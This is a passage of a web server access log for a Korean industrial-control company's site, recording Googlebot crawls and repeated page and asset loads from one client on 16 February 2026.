192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:02:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.65] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[16/Feb/2026:19:02:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.193] [Length 9999] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[16/Feb/2026:19:02:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 66.249.66.78] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:02:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 66.249.66.169] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:02:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 66.249.66.65] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:02:33 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 66.249.66.37] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:02:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 66.249.66.78] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Googlebot-Image/1.0" "-" -[16/Feb/2026:19:02:35 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 66.249.66.160] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Googlebot-Image/1.0" "-" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:05:57 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18461] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:21:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18597] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:24:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:33:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:34:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:38:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:19:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 